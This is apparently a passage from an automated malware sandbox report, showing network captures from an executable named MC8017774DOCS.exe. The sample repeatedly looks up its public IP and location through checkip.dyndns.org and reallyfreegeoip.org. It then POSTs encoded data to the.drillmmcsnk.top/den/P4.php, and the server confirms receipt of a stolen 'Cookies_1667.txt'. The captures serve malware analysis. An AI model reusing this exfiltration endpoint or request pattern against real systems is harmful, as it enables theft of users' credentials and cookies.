                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 103
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  3192.168.2.649846132.226.8.169804488C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 25, 2024 07:10:06.728753090 CET151OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Nov 25, 2024 07:10:09.312534094 CET272INHTTP/1.1 200 OK
                                                                                                                                                  Date: Mon, 25 Nov 2024 06:10:09 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 103
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  4192.168.2.649858132.226.8.169804488C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 25, 2024 07:10:11.210953951 CET151OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Nov 25, 2024 07:10:12.638983011 CET272INHTTP/1.1 200 OK
                                                                                                                                                  Date: Mon, 25 Nov 2024 06:10:12 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 103
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  5192.168.2.649866132.226.8.169804488C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 25, 2024 07:10:14.426227093 CET151OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Nov 25, 2024 07:10:16.424850941 CET272INHTTP/1.1 200 OK
                                                                                                                                                  Date: Mon, 25 Nov 2024 06:10:15 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 103
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                                  Nov 25, 2024 07:10:16.425348997 CET272INHTTP/1.1 200 OK
                                                                                                                                                  Date: Mon, 25 Nov 2024 06:10:15 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 103
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  6192.168.2.649877132.226.8.169804488C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 25, 2024 07:10:18.221563101 CET151OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Nov 25, 2024 07:10:19.680177927 CET272INHTTP/1.1 200 OK
                                                                                                                                                  Date: Mon, 25 Nov 2024 06:10:19 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 103
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  7192.168.2.649885132.226.8.169804488C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 25, 2024 07:10:21.579725981 CET151OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Nov 25, 2024 07:10:22.979583025 CET272INHTTP/1.1 200 OK
                                                                                                                                                  Date: Mon, 25 Nov 2024 06:10:22 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 103
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  8192.168.2.649896132.226.8.169804488C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 25, 2024 07:10:24.847112894 CET151OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Nov 25, 2024 07:10:26.655838966 CET272INHTTP/1.1 200 OK
                                                                                                                                                  Date: Mon, 25 Nov 2024 06:10:26 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 103
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  9192.168.2.6499285.182.211.149804488C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 25, 2024 07:10:37.774224997 CET143OUTPOST /den/P4.php HTTP/1.1
                                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                                  Host: the.drillmmcsnk.top
                                                                                                                                                  Content-Length: 1432
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Nov 25, 2024 07:10:37.779309988 CET1432OUTData Raw: 4c 50 54 35 65 67 76 50 32 30 58 73 76 65 42 63 51 49 76 45 44 6f 66 66 44 31 77 58 78 37 2b 5a 4f 51 4c 30 58 42 59 65 42 6d 76 4b 47 6c 32 45 55 39 35 72 6c 57 2b 63 38 4c 6c 71 2b 58 59 51 44 6c 61 34 69 46 78 78 59 45 70 43 47 74 70 4b 56 4a
                                                                                                                                                  Data Ascii: LPT5egvP20XsveBcQIvEDoffD1wXx7+ZOQL0XBYeBmvKGl2EU95rlW+c8Llq+XYQDla4iFxxYEpCGtpKVJaD2Hr9cdcOiNIulsEGWctGEvQb/cWLZRcIfOr1k7qXOLrQ7/PpC438ZgmIWT0WAQc0Guaq0BQ2kDkmZURg3odpDNOx9A9XSzfhRvm9mWJ1c/nm0RFppwfJoh3icT/7K9X3HBAtdfsC+meA1UEI+9ly/nNi/7cn/ys
                                                                                                                                                  Nov 25, 2024 07:10:39.098196983 CET250INHTTP/1.1 201 Created
                                                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                                                  content-length: 86
                                                                                                                                                  date: Mon, 25 Nov 2024 06:10:38 GMT
                                                                                                                                                  server: LiteSpeed
                                                                                                                                                  connection: Keep-Alive
                                                                                                                                                  Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 44 61 74 61 20 75 70 6c 6f 61 64 65 64 20 61 6e 64 20 64 65 63 72 79 70 74 65 64 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 2c 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 43 6f 6f 6b 69 65 73 5f 31 36 36 37 2e 74 78 74 22 7d
                                                                                                                                                  Data Ascii: {"message":"Data uploaded and decrypted successfully.","file_name":"Cookies_1667.txt"}


                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  0192.168.2.649815172.67.177.1344434488C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-11-25 06:09:56 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2024-11-25 06:09:57 UTC851INHTTP/1.1 200 OK
                                                                                                                                                  Date: Mon, 25 Nov 2024 06:09:57 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 361
                                                                                                                                                  Connection: close
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                  Age: 478906
                                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sre3Zfq0oUrHdGe4bkDLPNWSAUTYas5r5jXHMT8hLXao9%2BzGQWb9F8m2Mfjgg4cXSrIeQhE3V%2BlBWwGFyR37csH7HNLrLH9UgwGgIlatVjHkyPIZaQ%2Fx7SrChTzfuRpgiFop8fJl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8e7f790b7eba0caa-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1677&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1645997&cwnd=238&unsent_bytes=0&cid=a8d4bf7599bffa27&ts=460&x=0"
                                                                                                                                                  2024-11-25 06:09:57 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  1192.168.2.649821172.67.177.1344434488C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-11-25 06:09:59 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  2024-11-25 06:09:59 UTC857INHTTP/1.1 200 OK
                                                                                                                                                  Date: Mon, 25 Nov 2024 06:09:59 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 361
                                                                                                                                                  Connection: close
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                  Age: 478908
                                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bfr3OZKQmXlcDP5OXrGiltNUYk23T3y3maN9Ye0XD16%2BMAO%2FNA1ulm3NAyvBlCF2%2FScKNOGT%2FYqO5eOliJJIVptGpEl7JzGIg5tbF9h1dxXzZaoxw3jPi7o8iGM7qN%2B2NKAtNzfJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8e7f7919eadfef9f-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1987&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1449131&cwnd=191&unsent_bytes=0&cid=49a2bf9f4ae7c2ec&ts=475&x=0"
                                                                                                                                                  2024-11-25 06:09:59 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  2192.168.2.649838172.67.177.1344434488C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-11-25 06:10:05 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  2024-11-25 06:10:06 UTC851INHTTP/1.1 200 OK
                                                                                                                                                  Date: Mon, 25 Nov 2024 06:10:06 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 361
                                                                                                                                                  Connection: close
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                  Age: 478915
                                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9hGK4aScMIpRmbHmHLoRgx5O3cZ0mPjGXBfm%2B%2BZCXzrN9rvaBqQSOs%2FrwEBSSghtexj6thGWMQii4BbsMNG4R0cclMr1754bcjU5v4bHiNRfrHMOLWcEWb5ChkMBqAFeE5ZYIubC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8e7f79450cf88c42-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1987&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1454183&cwnd=252&unsent_bytes=0&cid=8d48d88e11c78908&ts=450&x=0"
                                                                                                                                                  2024-11-25 06:10:06 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  3192.168.2.649852172.67.177.1344434488C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-11-25 06:10:10 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2024-11-25 06:10:11 UTC855INHTTP/1.1 200 OK
                                                                                                                                                  Date: Mon, 25 Nov 2024 06:10:10 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 361
                                                                                                                                                  Connection: close
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                  Age: 478919
                                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eU81lUF7kdVX1o3HF9%2BwTz3X53SZBa4K2TMakAwsUDWJ%2BhmWMQVrnvDtzcsBqrZ%2FytPiDqPazeYlkkBIOnWYYkOmoHtAS6yHy58DQR3xJbB5tETXwBY%2BNZq0%2FFTL1YiqfoABp8e5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8e7f796239db430e-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1920&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1798029&cwnd=178&unsent_bytes=0&cid=2867854f75c9e077&ts=471&x=0"
                                                                                                                                                  2024-11-25 06:10:11 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  4192.168.2.649862172.67.177.1344434488C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-11-25 06:10:13 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2024-11-25 06:10:14 UTC851INHTTP/1.1 200 OK
                                                                                                                                                  Date: Mon, 25 Nov 2024 06:10:14 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 361
                                                                                                                                                  Connection: close
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                  Age: 478923
                                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YcoRa0BasHxiky4tBuHEVk3UVnMp4DKbclpVH3RnMwaU1%2FBW6u0bajjUkZ5Ek1deaX7CUy%2FVpRYpBNtptlr2UKpOSWMW1my2ak27YqGpGz%2BaLkLSOT6sjeGIknNOWjSZCf8QQ9OP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8e7f79765fea0cb8-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1661&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1765417&cwnd=162&unsent_bytes=0&cid=e835a674fdd209f2&ts=450&x=0"
